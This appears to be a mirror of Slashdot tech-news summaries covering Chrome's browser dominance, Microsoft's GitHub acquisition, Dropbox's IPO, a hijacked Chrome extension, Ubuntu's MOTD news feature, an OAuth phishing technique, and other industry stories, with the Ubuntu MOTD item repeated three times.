Slashdot Mirror

Iwastheone shares a report from Ars Technica's Peter Bright: With Microsoft's decision to end development of its own Web rendering engine and switch to Chromium, control over the Web has functionally been ceded to Google. That's a worrying turn of events, given the company's past behavior. Chrome itself has about 72 percent of the desktop-browser market share. Edge has about 4 percent. Opera, based on Chromium, has another 2 percent. The abandoned, no-longer-updated Internet Explorer has 5 percent, and Safari -- only available on macOS -- about 5 percent. When Microsoft's transition is complete, we're looking at a world where Chrome and Chrome-derivatives take about 80 percent of the market, with only Firefox, at 9 percent, actively maintained and available cross-platform.

The mobile story has stronger representation from Safari, thanks to the iPhone, but overall tells a similar story. Chrome has 53 percent directly, plus another 6 percent from Samsung Internet, another 5 percent from Opera, and another 2 percent from Android browser. Safari has about 22 percent, with the Chinese UC Browser sitting at about 9 percent. That's two-thirds of the mobile market going to Chrome and Chrome derivatives. In terms of raw percentages, Google won't have quite as big a lock on the browser space as Microsoft did with Internet Explorer -- Internet Explorer 6 peaked at around 80 percent, and all versions of Internet Explorer together may have reached as high as 95 percent. But Google's reach is, in practice, much greater: not only is the Web a substantially more important place today than it was in the early 2000s, but also there's a whole new mobile Web that operates in addition to the desktop Web. Google has deployed proprietary technology and left the rest of the industry playing catch-up, writes Peter. The company has "tried to push the Web into a Google-controlled proprietary direction to improve the performance of Google's online services when used in conjunction with Google's browser, consolidating Google's market positioning and putting everyone else at a disadvantage."

YouTube has been a particular source of problems. One example Peter provides has to do with a hidden, empty HTML element that was added to each YouTube video to disable Edge's hardware accelerated video decoding: "For no obvious reason, Google changed YouTube to add a hidden, empty HTML element that overlaid each video. This element disabled Edge's fastest, most efficient hardware accelerated video decoding. It hurt Edge's battery-life performance and took it below Chrome's. The change didn't improve Chrome's performance and didn't appear to serve any real purpose; it just hurt Edge, allowing Google to claim that Chrome's battery life was actually superior to Edge's. Microsoft asked Google if the company could remove the element, to no avail."

Joshua Bakita, a former software engineering intern on the Edge team at Microsoft, says one of the reasons why Microsoft had to ditch EdgeHTML rendering engine in Edge browser and switch to Chromium was to keep up with the changes (some of which were notorious) that Google pushed to its sites. These changes were designed to ensure that Edge and other browsers could not properly run Google's sites, he alleged. Responding to a comment, he wrote: "For example, they may start integrating technologies for which they have exclusive, or at least 'special' access. Can you imagine if all of a sudden Google apps start performing better than anyone else's?" This is already happening. I very recently worked on the Edge team, and one of the reasons we decided to end EdgeHTML was because Google kept making changes to its sites that broke other browsers, and we couldn't keep up.

For example, they recently added a hidden empty div over YouTube videos that causes our hardware acceleration fast-path to bail (should now be fixed in Win10 Oct update). Prior to that, our fairly state-of-the-art video acceleration put us well ahead of Chrome on video playback time on battery, but almost the instant they broke things on YouTube, they started advertising Chrome's dominance over Edge on video-watching battery life. What makes it so sad, is that their claimed dominance was not due to ingenious optimization work by Chrome, but due to a failure of YouTube. On the whole, they only made the web slower.

Now while I'm not sure I'm convinced that YouTube was changed intentionally to slow Edge, many of my co-workers are quite convinced -- and they're the ones who looked into it personally. To add to this all, when we asked, YouTube turned down our request to remove the hidden empty div and did not elaborate further. And this is only one case.

New submitter Fatalis writes: Substack is a venture capital funded startup for subscription-based newsletters, and it admittedly chose its name following the advice from a Paul Graham (co-founder of Y Combinator) article to prefer names not registered in the .com zone. The same name has also been the user handle for a prolific open-source developer who now finds themselves competing for recognition in the tech space with a capital backed company. The lesson seems to be for developers to protect their personal brand by registering a domain name with the .com extension due to it being perceived as the default.

The supposed acquisition of popular code repository GitHub by Microsoft has drawn an unprecedented backlash from the developer community. Over the weekend, after Bloomberg reported that the two companies could make the announcement as soon as Monday, hundreds of developers took to forums and social media to express their disappointment, with many saying that they would be leaving the platform if the deal goes through.

So why so much outrage? In a conversation with Slashdot, software developer and student Sean said that he believes a deal of such capacity would be bad for the open source community. "They've shown time and time again that they can't be trusted," he said. Sean and many other believe that Microsoft would eventually start telemetry program on the code repository. "Aside from Microsoft not being trustworthy to the open source community, I'm sure they'll add tracking and possibly even ads to all the sites within GitHub. As well as possibly use it to push LinkedIn (which they own)," he said. Ryan Hoover, the founder of ProductHunt, wrote on Sunday, "Anecdotally, the developer community is very unapproving of this move. I'm curious how Microsoft manages this and how GitHub changes (or doesn't change)." Even as Microsoft has "embraced" the open source community in the recent years (under the leadership of Mr. Nadella), for many developers, it will take time -- if at all -- to forget the company's past closed-ecosystem approach. Just this weekend, a developer accused Microsoft of stealing his code.

A petition that seeks to "stop Microsoft from buying Github" had garnered support from more than 400 developers. Prominent developer Andre Staltz said, "If you're still optimistic about the Microsoft-GitHub acquisition, consider this: They didn't ask your opinion not even a single bit, even though it was primarily your commits, stars, and repositories which made GH become a valuable platform." More importantly, if the comments left on Slashdot, Reddit, and HackerNews, places that overwhelmingly count developers and other IT industry experts among their audience, are anything to go by, Microsoft better has a good plan on how it intends to operate GitHub after the buyout. Security reporter Catalin Cimpanu said, "LinkedIn has turned into a slow-loading junk after the Microsoft acquisition. I can only imagine what awaits GitHub." On his part, Mat Velloso, who is technical advisor to CTO at Microsoft, said, "I don't think people understand how many of us at Microsoft love GitHub to the bottom of our hearts. If anybody decided to mess with that community, there would be a riot to say the least."

Jacques Mattheij: Companies that are too big to fail and that lose money are a dangerous combination, people have warned about GitHub becoming as large as it did as problematic because it concentrates too much of the power to make or break the open source world in a single entity, moreso because there were valid questions about GitHubs financial viability. The model that GitHub has -- sell their services to closed source companies but provide the service for free for open source groups -- is only a good one if the closed source companies bring in enough funds to sustain the model. Some sort of solution should have been found -- preferably in collaboration with the community -- not an 'exit' to one of the biggest sharks in the tank. So, here is what is wrong with this deal and why anybody active in the open source community should be upset that Microsoft is going to be the steward of this large body of code. For starters, Microsoft has a very long history of abusing its position vis-a-vis open source and other companies. I'm sure you'll be able to tell I'm a cranky old guy by looking up the dates to some of these references, but 'new boss, same as the old boss' applies as far as I'm concerned. Yes, the new boss is a nicer guy but it's the same corporate entity. Update: It's official. Microsoft has acquired GitHub for a whopping sum of $7.5B.

Yesterday Dropbox finally launched its stock on NASDAQ. Reuters reports: Dropbox Inc's shares closed at $28.42, up more than 35 percent in their first day of trading on Friday, as investors rushed to buy into the biggest technology initial public offering in more than a year even as the wider sector languished... At the stock's opening price, Dropbox had a market valuation of $12.67 billion, well above the $10 billion valuation it had in its last private funding round... It has yet to turn a profit, which is common for startups that invest heavily in growth. As a public company Dropbox will be under pressure to quickly trim its losses. The 11-year old company reported revenue of $1.11 billion in 2017, up from $844.8 million a year earlier. Its net loss nearly halved from $210.2 million in 2016.
CNBC reports that Y Combinator almost passed on a chance to invest in Dropbox -- which became its first IPO ever -- "because it had misgivings about bringing on a solo entrepreneur." After Drew Houston, the creator of Dropbox, scrambled to find a co-founder in time for his in-person interview, the company was admitted into YC in 2007. Four years later, venture capitalists poured money into Dropbox at a $4 billion valuation. YC has since become a power player in Silicon Valley, helping spawn numerous companies valued at over $1 billion today including Stripe, Airbnb, Instacart and Coinbase. It also backed Twitch, which Amazon acquired in 2014 for about $970 million, and the self-driving tech start-up Cruise, which GM bought in 2016 for over $1 billion. But in its 13-year history, YC had yet to see any of its companies go public until Dropbox's stock market debut on Friday...

Houston is now worth over $3 billion and co-founder Arash Ferdowsi owns shares valued at more than $1 billion.
Dropbox's Twitter feed posted a video from their NASDAQ debut, adding "We're so thankful for the 500 million registered users who helped us get here."

pizzutz writes: Chrome's popular Web Developer plugin was briefly hijacked on Wednesday when an attacker gained control of the author's Google account and released a new version (0.49) which injected ads into web pages of more than a million users who downloaded the update. The version was quickly replaced with an uncompromised version (0.5) and all users are urged to update immediately.
Lauren Weinstein has a broader warning: While the browser firms work extensively to build top-notch security and privacy controls into the browsers themselves, the unfortunate fact is that these can be undermined by add-ons, some of which are downright crooked, many more of which are sloppily written and poorly maintained. Ironically, some of these add-on extensions and apps claim to be providing more security, while actually undermining the intrinsic security of the browsers themselves. Others (and this is an extremely common scenario) claim to be providing additional search or shopping functionalities, while actually only existing to silently collect and sell user browsing activity data of all sorts.
Lauren also warns about sites that "push users very hard to install these privacy-invasive, data sucking extensions" -- and believes requests for permissions aren't a sufficient safeguard for most users. "Expecting them to really understand what these permissions mean is ludicrous. We're the software engineers and computer scientists -- most users aren't either of these. They have busy lives -- they expect our stuff to just work, and not to screw them over."

In a blog post, Trevor Elkins points out the large sizes of common apps like LinkedIn and Facebook. "I went to update all my apps the other day when something caught my eye... since when does LinkedIn take up 275MB of space?!" Elkins wrote. "In fact, the six apps in this picture average roughly 230MB in size, 1387MB in total. That would take an 8Mbit internet connection 24 minutes to download, and I'd still be left with 27 additional apps to update! More and more companies are adopting shorter release cycles (two weeks or so) and it's becoming unsustainable as a consumer to update frequently."

Should Apple do something to solve this "systematic" problem? Elkins writes, "how does an app that occasionally sends me a connection request and recruiter spam take up 275MB?"

Further discussion via Hacker News.

Dustin Kirkland, Ubuntu Product and Strategy at Canonical, writes: Howdy all- Back in March, we asked the HackerNews community, "What do you want to see in Ubuntu 17.10?": https://ubu.one/AskHN. A passionate discussion ensued, the results of which are distilled into this post: http://ubu.one/thankHN. In fact, you can check that link, http://bit.ly/thankHN and see our progress so far this cycle. We already have a beta code in 17.10 available for your testing for several of those:

- GNOME replaced Unity
- Bluetooth improvements with a new BlueZ
- Switched to libinput
- 4K/Multimonitor/HiDPI improvements
- Upgraded to Network Manager 1.8
- New Subiquity server installer
- Minimal images (36MB, 18% smaller)

And several others have excellent work in progress, and will be complete by 17.10:

- Autoremove old kernels from /boot
- EXT4 encryption with fscrypt
- Better GPU/CUDA support

In summary -- your feedback matters! There are hundreds of engineers and designers working for *you* to continue making Ubuntu amazing! Along with the switch from Unity to GNOME, we're also reviewing some of the desktop applications we package and ship in Ubuntu. We're looking to crowdsource input on your favorite Linux applications across a broad set of classic desktop functionality. We invite you to contribute by listing the applications you find most useful in Linux in order of preference.

Click through for info on how to contribute. To help us parse your input, please copy and paste the following bullets with your preferred apps in Linux desktop environments. You're welcome to suggest multiple apps, please just order them prioritized (e.g. Web Browser: Firefox, Chrome, Chromium). If some of your functionality has moved entirely to the web, please note that too (e.g. Email Client: Gmail web, Office Suite: Office360 web). If the software isn't free/open source, please note that (e.g. Music Player: Spotify client non-free). If I've missed a category, please add it in the same format. If your favorites aren't packaged for Ubuntu yet, please let us know, as we're creating hundreds of new snap packages for Ubuntu desktop applications, and we're keen to learn what key snaps we're missing.

• Web Browser: ???
• Email Client: ???
• Terminal: ???
• IDE: ???
• File manager: ???
• Basic Text Editor: ???
• IRC/Messaging Client: ???
• PDF Reader: ???
• Office Suite: ???
• Calendar: ???
• Video Player: ???
• Music Player: ???
• Photo Viewer: ???
• Screen recording: ???

In the interest of opening this survey as widely as possible, we've cross-posted this thread to HackerNews, Reddit, and Slashdot. We very much look forward to another friendly, energetic, collaborative discussion. Thank you! @DustinKirkland On behalf of @Canonical and @Ubuntu

Thursday Lproven (Slashdot reader #6030) wrote: It appears that Ubuntu is using a feature it has added -- intended to insert headlines of breaking tech news (security alerts and so on) into the Message of the Day displayed at login to the console -- to display advertising and promotional messages.
The message in question linked to a Hacker Noon article titled "How HBO's Silicon Valley built 'Not Hotdog' with mobile TensorFlow, Keras & React Native." Later that day Dustin Kirkland, a Ubuntu Product Manager for the feature's design (and the Core Developer for its implementation) suggested the message had been mistaken for an ad, describing it on Hacker News as a "fun fact... an interesting tidbit of potpourri from the world of Ubuntu," and later saying it was intended like Google's doodles. "Last week's message actually announced an Ubuntu conference in Latin America. The week before, we linked to an article asking for feedback on Kubuntu. Before that, we announced the availability of Extended Security Maintenance updates for 12.04. And so on." He later confirmed Canonical received no money for the message, and also pointed out that the messages all come from an open source repository, and "You're welcome to propose your own messages for merging, if you have a well formatted, informative message for Ubuntu users."

Click through for a condensed version of the complete response by Dustin Kirkland, Ubuntu Product and Strategy at Canonical.
Kirkland describes the design of the feature as follows:

• Asynchronously, about 60 seconds after boot, a systemd timer fires which runs "/etc/update-motd.d/50-motd-news --force"
• It sources 3 admin-editable config variables in /etc/default/motd-news. The defaults are: ENABLED=1, URLS="https://motd.ubuntu.com", WAIT="5"
• The admin can disable it entirely (ENABLED=0), change or add other MOTD news sources (your corporate IT team could run its own), and change the wait time in seconds
• If it's enabled, that systemd timer job will loop over each of the URLS (note, that it's important that these should be https with valid SSL certificates), trim them to 80 characters per line, and a maximum of 10 lines, and concatenate them to a cache file in /var/cache/motd-news
• Every ~12 hours thereafter (with a little bit of random timer fuzzing), this systemd timer job will re-run and update the /var/cache/motd-news
• Upon login, the contents of /var/cache/motd-news is just printed to screen.

Kirkland notes the message can be customized by local IT administrators, or used to deliver warnings about serious vulnerabilities like Shellshock or Heartbleed. And he also describes the dynamic motd as a Ubuntu feature since adopted by other distros (including Debian) as "a flexible framework that enables distro packages or administrators to add executable scripts in /etc/update-motd.d/* to generate informative, interesting messages displayed at login... for almost 40 years of Linux/UNIX, the 'Message of the Day' was anything but that... It was a message that was created at one point in time, when the distro released, and that's about it. And we managed to change that."

Thursday Lproven (Slashdot reader #6030) wrote: It appears that Ubuntu is using a feature it has added -- intended to insert headlines of breaking tech news (security alerts and so on) into the Message of the Day displayed at login to the console -- to display advertising and promotional messages.
The message in question linked to a Hacker Noon article titled "How HBO's Silicon Valley built 'Not Hotdog' with mobile TensorFlow, Keras & React Native." Later that day Dustin Kirkland, a Ubuntu Product Manager for the feature's design (and the Core Developer for its implementation) suggested the message had been mistaken for an ad, describing it on Hacker News as a "fun fact... an interesting tidbit of potpourri from the world of Ubuntu," and later saying it was intended like Google's doodles. "Last week's message actually announced an Ubuntu conference in Latin America. The week before, we linked to an article asking for feedback on Kubuntu. Before that, we announced the availability of Extended Security Maintenance updates for 12.04. And so on." He later confirmed Canonical received no money for the message, and also pointed out that the messages all come from an open source repository, and "You're welcome to propose your own messages for merging, if you have a well formatted, informative message for Ubuntu users."

Click through for a condensed version of the complete response by Dustin Kirkland, Ubuntu Product and Strategy at Canonical.
Kirkland describes the design of the feature as follows:

• Asynchronously, about 60 seconds after boot, a systemd timer fires which runs "/etc/update-motd.d/50-motd-news --force"
• It sources 3 admin-editable config variables in /etc/default/motd-news. The defaults are: ENABLED=1, URLS="https://motd.ubuntu.com", WAIT="5"
• The admin can disable it entirely (ENABLED=0), change or add other MOTD news sources (your corporate IT team could run its own), and change the wait time in seconds
• If it's enabled, that systemd timer job will loop over each of the URLS (note, that it's important that these should be https with valid SSL certificates), trim them to 80 characters per line, and a maximum of 10 lines, and concatenate them to a cache file in /var/cache/motd-news
• Every ~12 hours thereafter (with a little bit of random timer fuzzing), this systemd timer job will re-run and update the /var/cache/motd-news
• Upon login, the contents of /var/cache/motd-news is just printed to screen.

Kirkland notes the message can be customized by local IT administrators, or used to deliver warnings about serious vulnerabilities like Shellshock or Heartbleed. And he also describes the dynamic motd as a Ubuntu feature since adopted by other distros (including Debian) as "a flexible framework that enables distro packages or administrators to add executable scripts in /etc/update-motd.d/* to generate informative, interesting messages displayed at login... for almost 40 years of Linux/UNIX, the 'Message of the Day' was anything but that... It was a message that was created at one point in time, when the distro released, and that's about it. And we managed to change that."

Thursday Lproven (Slashdot reader #6030) wrote: It appears that Ubuntu is using a feature it has added -- intended to insert headlines of breaking tech news (security alerts and so on) into the Message of the Day displayed at login to the console -- to display advertising and promotional messages.
The message in question linked to a Hacker Noon article titled "How HBO's Silicon Valley built 'Not Hotdog' with mobile TensorFlow, Keras & React Native." Later that day Dustin Kirkland, a Ubuntu Product Manager for the feature's design (and the Core Developer for its implementation) suggested the message had been mistaken for an ad, describing it on Hacker News as a "fun fact... an interesting tidbit of potpourri from the world of Ubuntu," and later saying it was intended like Google's doodles. "Last week's message actually announced an Ubuntu conference in Latin America. The week before, we linked to an article asking for feedback on Kubuntu. Before that, we announced the availability of Extended Security Maintenance updates for 12.04. And so on." He later confirmed Canonical received no money for the message, and also pointed out that the messages all come from an open source repository, and "You're welcome to propose your own messages for merging, if you have a well formatted, informative message for Ubuntu users."

Click through for a condensed version of the complete response by Dustin Kirkland, Ubuntu Product and Strategy at Canonical.
Kirkland describes the design of the feature as follows:

• Asynchronously, about 60 seconds after boot, a systemd timer fires which runs "/etc/update-motd.d/50-motd-news --force"
• It sources 3 admin-editable config variables in /etc/default/motd-news. The defaults are: ENABLED=1, URLS="https://motd.ubuntu.com", WAIT="5"
• The admin can disable it entirely (ENABLED=0), change or add other MOTD news sources (your corporate IT team could run its own), and change the wait time in seconds
• If it's enabled, that systemd timer job will loop over each of the URLS (note, that it's important that these should be https with valid SSL certificates), trim them to 80 characters per line, and a maximum of 10 lines, and concatenate them to a cache file in /var/cache/motd-news
• Every ~12 hours thereafter (with a little bit of random timer fuzzing), this systemd timer job will re-run and update the /var/cache/motd-news
• Upon login, the contents of /var/cache/motd-news is just printed to screen.

Kirkland notes the message can be customized by local IT administrators, or used to deliver warnings about serious vulnerabilities like Shellshock or Heartbleed. And he also describes the dynamic motd as a Ubuntu feature since adopted by other distros (including Debian) as "a flexible framework that enables distro packages or administrators to add executable scripts in /etc/update-motd.d/* to generate informative, interesting messages displayed at login... for almost 40 years of Linux/UNIX, the 'Message of the Day' was anything but that... It was a message that was created at one point in time, when the distro released, and that's about it. And we managed to change that."

An anonymous reader quotes a report from Motherboard: For almost six years, Google knew about the exact technique that someone used to trick around one million people into giving away access to their Google accounts to hackers on Wednesday. Even more worrisome: other hackers might have known about this technique as well. On October 4, 2011, a researcher speculated in a mailing list that hackers could trick users into giving them access to their accounts by simply posing as a trustworthy app. This attack, the researcher argued in the message, hinges on creating a malicious application and registering it on the OAuth service under a name like "Google," exploiting the trust that users have in the OAuth authorization process. OAuth is a standard that allows users to grant websites or applications access to their online email and social networking accounts, or parts of their accounts, without giving up their passwords. "Imagine someone registers a client application with an OAuth service, let's call it Foobar, and he names his client app 'Google, Inc.'. The Foobar authorization server will engage the user with 'Google, Inc. is requesting permission to do the following,'" Andre DeMarre wrote in the message sent to the Internet Engineering Task Force (IETF), the independent organization responsible for many of the internet's operating standards. "The resource owner might reason, 'I see that I'm legitimately on the https://www.foobar.com/ site, and Foobar is telling me that Google wants permission. I trust Foobar and Google, so I'll click Allow,'" DeMarre concluded. As it turns out, DeMarre claims he warned Google directly about this vulnerability in 2012, and suggested that Google address it by checking to see ensure the name of any given app matched the URL of the company behind it. In a Hacker News post, DeMarre said he reported this attack vector back then, and got a "modest bounty" for it.

An anonymous reader writes: "Dmitry Bogatov, Debian developer and Tor node admin, is still being held in a Moscow jail," tweeted the EFF Saturday. IT Wire reports that the 25-year-old math teacher was arrested earlier this month "on suspicion of organizing riots," and is expected to be held in custody until June 8. "The panel investigating the protests claims Bogatov posted several incitory messages on the sysadmin.ru forum; for example, one claim said he was asking people to bring 'bottles, fabric, gasoline, turpentine, foam plastic' to Red Square, according to a post at Hacker News. The messages were sent in the name of one Airat Bashirov and happened to be transmitted through the Tor node that Bogatov was running. The Hacker News post said Bogatov's lawyer had produced surveillance video footage to show that he was elsewhere at the time when the messages were posted.
"After Dmitry's arrest," reports the Free Bogatov site, "Airat Bashirov continue to post messages. News outlets 'Open Russia' and 'Mediazona' even got a chance to speak with him."

Earlier this month the Debian GNU/Linux project also posted a message of support, noting Dmitry maintains several packages for command line and system tools, and saying their group "honours his good work and strong dedication to Debian and Free Software... we hope he is back as soon as possible to his endeavours... In the meantime, the Debian Project has taken measures to secure its systems by removing Dmitry's keys in the case that they are compromised."

Slashdot reader ben-hnb is a developer who loves the idea of running a startup, or being one of the ones who got in early. But how exactly does he get there? I've got no "business" experience. Everyone seems to want to get on the startup incubator train -- the latest U.K. model I've seen, Launchpad, would even train (MA!) and support me financially for a year while developing the initial product. This just one in a long list of different models, from the famous Y-Combinator three-month model to the 500 Startups four-month seed program and simple co-working spaces with a bit of help, like Launch 22.

If you wanted to get a startup going, where would you go to first and why? Or would you just strike out in your bedroom/garage?
Leave your best answers in the comments. How would you launch a software startup?

"The Ask.com search engine went through some sort of technical issue late Friday night, as its servers were exposing the internal Apache server status page, revealing recently processed search queries," reports BleepingComputer. An anonymous reader writes: The issue is now fixed, but a copy of the server status page with some search queries can still be viewed in Google's search engine cache. "Some of the weirdest search queries were collected by users in a Hacker News thread," reports BleepingComputer, adding "As you'd expect, the server page included plenty of searches for porn."

The issue also affected localized Ask.com servers, such as uk.ask.com/server-status, us.ask.com/server-status, and de.ask.com/server-status, but no user data was exposed, as the search queries passed through load balancers and already hid user IPs.

Ipsita Agarwal via Backchannel retells the story of how India's underfunded space organization, ISRO, managed to send a rocket to Mars for less than it cost to make the movie "The Martian," starring Matt Damon as Mark Watney. "While NASA's Mars probe, Maven, cost $651 million, the budget for this mission was $74 million," Agarwal writes. In what appears to be India's version of "Hidden Figures" (a movie that also cost more to make than ISRO's budget for the Mars rocket), the team of scientists behind the rocket launch consisted of Indian women, who not only managed to pull off the mission successfully but did so in only 18 months. Backchannel reports: A few months and several million kilometers later, the orbiter prepared to enter Mars' gravity. This was a critical moment. If the orbiter entered Mars' gravity at the wrong angle, off by so much as one degree, it would either crash onto the surface of Mars or fly right past it, lost in the emptiness of space. Back on Earth, its team of scientists and engineers waited for a signal from the orbiter. Mission designer Ritu Karidhal had worked 48 hours straight, fueled by anticipation. As a child, Minal Rohit had watched space missions on TV. Now, Minal waited for news on the orbiter she and her colleague, Moumita Dutta, had helped engineer. When the signal finally arrived, the mission control room broke into cheers. If you work in such a room, deputy operations director, Nandini Harinath, says, "you no longer need to watch a thriller movie to feel the thrill in life. You feel it in your day-to-day work." This was not the only success of the mission. An image of the scientists celebrating in the mission control room went viral. Girls in India and beyond gained new heroes: the kind that wear sarees and tie flowers in their hair, and send rockets into space. User shas3 notes in a comment on Hacker News' post: "If you are interested in Indian women scientists and engineers, there is a nice compilation (a bit tiresome to read, but worth it, IMO) of biographical essays called 'Lilvati's Daughters.'"

Over the weekend, my colleague David ran a story that sought people's suggestion on how to make (force, encourage, advice) a novice programmer to be more professional. Several people have shared their insightful comment on the topic. One such comment, which has received an unusual support on not just Slashdot but elsewhere, is from William Woody, owner of Glenview Software (and who has previously worked as CTO at Cartifact, architect at AT&T Interactive). He writes: The problem is that our industry, unlike every other single industry except acting and modeling (and note neither are known for "intelligence") worship at the altar of youth. I don't know the number of people I've encountered who tell me that by being older, my experience is worthless since all the stuff I've learned has become obsolete. This, despite the fact that the dominant operating systems used in most systems is based on an operating system that is nearly 50 years old, the "new" features being added to many "modern" languages are really concepts from languages that are between 50 and 60 years old or older, and most of the concepts we bandy about as cutting edge were developed from 20 to 50 years ago. It also doesn't help that the youth whose accomplishments we worship usually get concepts wrong. I don't know the number of times I've seen someone claim code was refactored along some new-fangled "improvement" over an "outdated" design pattern who wrote objects that bear no resemblance to the pattern they claim to be following. And when I indicate that the "massive view controller" problem often represents a misunderstanding as to what constitutes a model and what constitutes a view, I'm told that I have no idea what I'm talking about -- despite having more experience than the critic has been alive, and despite graduating from Caltech -- meaning I'm probably not a complete idiot.) Our industry is rife with arrogance, and often the arrogance of the young and inexperienced. Our industry seems to value "cowboys" despite doing everything it can (with the management technique "flavor of the month") to stop "cowboys." Our industry is agist, sexist, one where the blind leads the blind, and seminal works attempting to understand the problem of development go ignored. You can read the full comment here or here.

Michael Seibel, a partner at Y Combinator, writes in a blog post: I'd like to make the point that success isn't the same as raising a round of financing. Quite the opposite: raising a round should be a byproduct of success. Using fundraising itself as a benchmark is dangerous for the entire community because it encourages a culture of optimizing for short term showmanship instead of making something people want and creating lasting value. I believe founders, investors, and the tech press should fundamentally change how they think about fundraising. By deemphasizing investment rounds we would have more opportunity to celebrate companies who develop measurable milestones of value creation, focus on serving a customer with a real need, and generate sustainable businesses with good margins.

JustAnotherOldGuy quotes a report from Boing Boing: The World Wide Web Consortium's Encrypted Media Extensions (EME) is a DRM system for web video, being pushed by Netflix, movie studios, and a few broadcasters. It's been hugely controversial within the W3C and outside of it, but one argument that DRM defenders have made throughout the debate is that the DRM is optional, and if you don't like it, you don't have to use it. That's not true any more. Some time in the past few days, Google quietly updated Chrome (and derivative browsers like Chromium) so that Widevine (Google's version of EME) can no longer be disabled; it comes switched on and installed in every Chrome instance. Because of laws like section 1201 of the U.S. Digital Millennium Copyright Act (and Canada's Bill C11, and EU implementations of Article 6 of the EUCD), browsers that have DRM in them are risky for security researchers to audit. These laws provide both criminal and civil penalties for those who tamper with DRM, even for legal, legitimate purposes, and courts and companies have interpreted this to mean that companies can punish security researchers who reveal defects in their products. Further reading: Boing Boing and Hacker News.

New submitter rkagerer writes: Dropbox unleashed a tidal wave of user backlash yesterday when it announced plans to eradicate its Public folder feature in 2017. Criticism from users whose links will break surfaced on Reddit, HackerNews and its own forums. Overnight, customers up-voted a feature request to reverse the decision, skyrocketing it to a "Top 10" position on the company's tracker. joemck explains: "There are countless users who have been using the public folder to post images and files in blogs and forums. These aren't just worthless jokes and memes that nobody will miss if you flip the switch and break all of them. These are often valuable resources that users have created and entrusted to you to retain and keep online." One user even created a comic strip for the occasion, with another concerned the URL he registered with the Coast Guard containing potentially lifesaving information will go dark. Although the feature was deprecated in 2012, it remained in place for existing users. The company provides an alternative sharing method, but some users claim it's not as convenient and doesn't provide direct links. According to the announcement, free accounts have until March 15 to update their links, while the lights will go out for paid accounts on September 1. UPDATE 12/17/16: Slashdot reader rkagerer notes, "Dropbox quietly killed the feature request after this story hit the front page, but the original content can still be found interleaved in the forum discussion."

An anonymous reader quotes a report from Ars Technica: For almost five months -- possibly longer -- the Spotify music streaming app has been assaulting users' storage devices with enough data to potentially take years off their expected lifespans. Reports of tens or in some cases hundreds of gigabytes being written in an hour aren't uncommon, and occasionally the recorded amounts are measured in terabytes. The overload happens even when Spotify is idle and isn't storing any songs locally. The behavior poses an unnecessary burden on users' storage devices, particularly solid state drives, which come with a finite amount of write capacity. Continuously writing hundreds of gigabytes of needless data to a drive every day for months or years on end has the potential to cause an SSD to die years earlier than it otherwise would. And yet, Spotify apps for Windows, Mac, and Linux have engaged in this data assault since at least the middle of June, when multiple users reported the problem in the company's official support forum. Three Ars reporters who ran Spotify on Macs and PCs had no trouble reproducing the problem reported not only in the above-mentioned Spotify forum but also on Reddit, Hacker News, and elsewhere. Typically, the app wrote from 5 to 10 GB of data in less than an hour on Ars reporters' machines, even when the app was idle. Leaving Spotify running for periods longer than a day resulted in amounts as high as 700 GB. According to comments left in the Spotify forum in the past 24 hours, the bug has been fixed in version 1.0.42, which is in the process of being rolled out.

Soon after it was announced that Project Include, a community for building meaningful, enduring diversity and inclusion into tech companies, would no longer work with Y Combinator startups, Facebook CEO Mark Zuckerberg defended Thiel's status as a Facebook board member in a message to employees. "We can't create a culture that says it cares about diversity and then excludes almost half the country because they back a political candidate," Zuckerberg wrote. "There are many reasons a person might support Trump that do not involve racism, sexism, xenophobia, or accepting sexual assault." The Verge reports: A screenshot of the memo was posted to Hacker News yesterday, and it later surfaced on Boing Boing. A Facebook spokesman confirmed the authenticity of the five-paragraph memo to The Verge. It appears to have been posted on Facebook for Work, the enterprise version of Facebook that the company recently made available to other companies. Thiel's endorsement of Trump has put those CEOs in a difficult position. On one hand he is a close adviser; on the other, his support for an erratic, racist demagogue has outraged many of their employees and partners. Like Y Combinator's Sam Altman before him, Zuckerberg defended the company's ties to Thiel by saying that the company has a moral obligation to consider a variety of viewpoints, no matter how abhorrent. "We care deeply about diversity," Zuckerberg wrote. "That's easy to do when it means standing up for ideas you agree with. It's a lot harder when it means standing up for the rights of people with different viewpoints to say what they care about. That's even more important." Of course, as the designer Jason Putorti wrote on Medium this week, Thiel already has an outsized capacity to stand up for ideas he agrees with: he spent $1.25 million to promote them. Zuckerberg's memo reads as if he is defending Thiel's right to post on Facebook. In fact, the question is whether someone who promotes opposition to gender and racial equality should be allowed to serve as a steward for a company whose stated mission is to connect the world.

Peter Thiel's support for U.S. Republican presidential candidate Donald Trump has given Silicon Valley a headache. This past weekend, Thiel donated $1.25 million to his campaign, which is driving away partners from Thiel's Silicon Valley accelerator, Y Combinator. Today, Project Include, a community for building meaningful, enduring diversity and inclusion into tech companies, said that it would no longer work with Y Combinator startups. "Thiel's actions are in direct conflict with our values at Project Include," the group's co-founder, Ellen Pao, wrote in a Medium post. "Because of this continued connection to YC, we are compelled to break off our relationship with YC." The Verge reports: Founded in 2005, Y Combinator has incubated some of the biggest tech companies of the past decade, including Airbnb, Dropbox, and Stripe. It faced a barrage of criticism over the weekend for refusing to dissociate itself from Thiel, who took an advisory role with the organization in 2015. In a series of tweets, YC's president stood by Thiel. "Cutting off opposing viewpoints leads to extremism and will not get us the country we want," Sam Altman wrote. "Diversity of opinion is painful but critical to the health of a democratic society. We can't start purging people for political support." In her post, Pao rejected the idea that Thiel's donation could be dismissed as political speech. "We agree that people shouldn't be fired for their political views, but this isn't a disagreement on tax policy, this is advocating hatred and violence," she wrote. "Giving more power to someone whose ascension and behavior strike fear into so many people is unacceptable. His attacks on black, Mexican, Asian, Muslim, and Jewish people, on women, and on others are more than just political speech; fueled by hate and encouraging violence, they make each of us feel unsafe."

An anonymous reader writes: Google is working on a new operating system dubbed Fuchsia OS for smartphones, computers, and various other devices. The new operating system was spotted in the Git repository, where the description reads: "Pick + Purple == Fuchsia (a new Operating System). Hacker News reports that Travis Geiselbrech, who worked on NewOS, BeOS, Danger, Palm's webOS and iOS, and Brian Swetland, who also worked on BeOS and Android will be involved in this project. Magenta and LK kernel will be powering the operating system. "LK is a kernel designed for small systems typically used in imbedded applications," reads the repository. "On the other hand, Magenta targets modern phones and modern personal computers with fast processors, non-trivial amounts of RAM with arbitrary peripherals doing open-ended computation." It's too early to tell exactly what this OS is meant for. Whether it's for an Android and Chrome OS merger or something completely new, it's exciting nonetheless.

